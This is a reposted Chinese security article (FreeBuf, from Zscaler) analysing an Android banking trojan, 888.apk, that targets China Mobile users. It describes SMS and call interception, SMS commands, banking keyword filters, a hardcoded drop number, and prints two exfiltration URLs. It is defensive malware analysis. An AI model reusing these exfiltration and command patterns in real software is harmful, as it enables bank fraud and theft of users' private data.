揭秘:针对中国移动用户的强大网银木马剖析

我们最近遇到一个安卓平台的网银木马,该木马主要瞄向中国的移动用户,检出率很低。该安卓木马能够拦截短信并寻找特定的关键字,盗取用户网银信息。此外,它还会从用户的移动设备中盗取所有的联系人信息,并将其发送到远程服务器。

木马相关信息

名字:888.apk

MD5:ff081c1400a948f2bcc4952fed2c818b。

VT:7/56 (分析该木马时)

样本:点我下载

木马功能:

1、拦截和捕获所有接收和发出的短信
2、拦截来电和结束通话的功能
3、通过短信接收C&C服务器指令
4、将盗取的数据通过短信、电子邮件、web请求发送到C&C服务器

代码级功能分析

下面就让我们一起分析下该木马的特征和功能实现:

0x01 捕获邮箱和手机号

在上面的截图中,可以看到,该木马将捕获的出站短信通过电子邮件发送到硬编码的163. Com邮箱地址。它将盗取的数据以“发给xxx的短信”为主题发送出去。

在这里,可以看到它将捕获到的入站短信以同样的参数用邮件发送到指定邮箱。此外,它还将同样的信息通过短信发送到一个硬编码的中国手机号码“15996581524”。

0x02 电话拦截

上图显示了该木马具有拦截来电的功能,并能够将来电号码以主题为“拨打进来的一次来电!”的邮件发送出去,而且它还有挂断电话的功能。

0x03 远程控制

该木马还能够通过短信接收C&C服务器发送的指令,该指令由木马作者远程发送。

在上面的截图中可以看到,攻击者可以通过短信发送指令“intercept#”来开始数据的捕获行为,还能够通过短信发送指令“interceptstop#”来停止捕获行为。

在上面的截图中我们可以看到,与网银交易有关的地方都做了字符串检测处理,它可以检测如“支付”、”校验”、”银行”、“余额”、“验证”的字符串,这很明显地表明木马的作者意图嗅探与网银相关的信息。

恶意软件将短信接收器和拨出电话服务的优先级设置为高优先级,这将确保当这些事件发生时,该木马比其他应用拥有更高的处理优先权。

0x04 请求发送

从上图中我们也能看到一些代码,这些代码能够确保该木马将盗取的联系人信息和短信数据通过Web请求的方式发送出去。

然而,在当前版本的木马中,这个功能似乎并不起作用……我们猜测可能是木马的作者仍旧在测试这个功能。

"http://192.168.1.102/input/input_data_get_contact.asp?user=XXX&pwd=XXXX&addr="
"http://192.168.1.102/input/input_data_get_sms.asp?user=XXX&pwd=XXX&addr=XXX&id=XXX"

木马窃取信息截图

下面的截图只是一个示例,显示木马的作者通过该恶意APK从感染用户那里捕获隐私信息。

1、发送邮件

2、拦截呼入电话

3、窃取联系人信息

4、受感染的中国移动用户

经过上面的一系列描述,我们已经可以看到这款移动平台的网银盗窃木马的威力。鉴于木马往往升级频繁,逃避查杀的能力也会与日俱增。我们相信未来,木马对抗将面临更大的挑战。

[参考来源research.zscaler,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)]

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2015-02-05

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏FreeBuf

躲不掉的红色炸弹,这次真的「爆」了

声明:本文由【MS509 Team】成员expsky原创,仅用于技术交流分享,禁止将相关技术应用到不当途径。 收到朋友的婚宴请帖后通常都要破费,而且不便躲避,所...

22070
来自专栏Debian社区

Ubuntu将于2017年1月1日起拒绝SHA-1签署的资源

今天,Debian开发者兼Ububtu成员Julian Andres Klode宣布,他计划在2017年1月1日关闭对APT资源库的SHA-1支持。业界反对SH...

13450
来自专栏张戈的专栏

分享一个免费SSL证书申请网站,给网站开启https协议

这些天,由于公司的业务需求,接触到了 ssl 证书和 https 协议。博客前几篇文章也分享了在 WEB 服务器上安装 SSL 证书,为网站开启 https 协...

63760
来自专栏安智客

金融盾中证书申请之RA系统介绍

金融盾中首要的任务是证书申请,证书申请涉及到银行系统、CA机构、RA机构等等,不管是PC时代还是移动互联网时代,银行系统、CA、RA后台服务系统基本一致。我们今...

25850
来自专栏FreeBuf

使用Go和Let's Encrypt证书部署HTTPS

为什么要使用HTTPS?使用HTTPS的途径有哪些?如何用Go来部署HTTPS?拿出你的小本本,你要的干货都在这儿! HTTPS 的好处我们已在之前的文章中提高...

26530
来自专栏黑白安全

黑客利用 Excel 文档来执行 ChainShot 恶意软件攻击

针对近日曝光的 Adobe Flash 零日漏洞(CVE-2018-5002),已经出现了一款名叫 CHAINSHOT 的恶意软件攻击。其利用微软 Excel ...

17840
来自专栏blueslu

使用https和ssl就真的是一个安全的网站吗?

2014年,大多数SEO者都开始关注https,并在网站采用https的。原因很简单:当时Google发布了一篇文章,宣布HTTPS将作为排名信号对网站进行评价...

50260
来自专栏安全领域

在微控制器和物联网上使用JavaScript:SSL / TLS

在今天的这篇文章中,我们回到Particle Photon上来解决他的一个最大的缺点:缺少TLS支持,接下来我们将详细介绍如何添加这一功能。

867140
来自专栏七夜安全博客

(原创)暴力破解西电校园网密码

40840
来自专栏耕耘实录

存储基础:ATA、SATA、SCSI、SAS、FC

版权声明:本文为耕耘实录原创文章,各大自媒体平台同步更新。欢迎转载,转载请注明出处,谢谢

34850

扫码关注云+社区

领取腾讯云代金券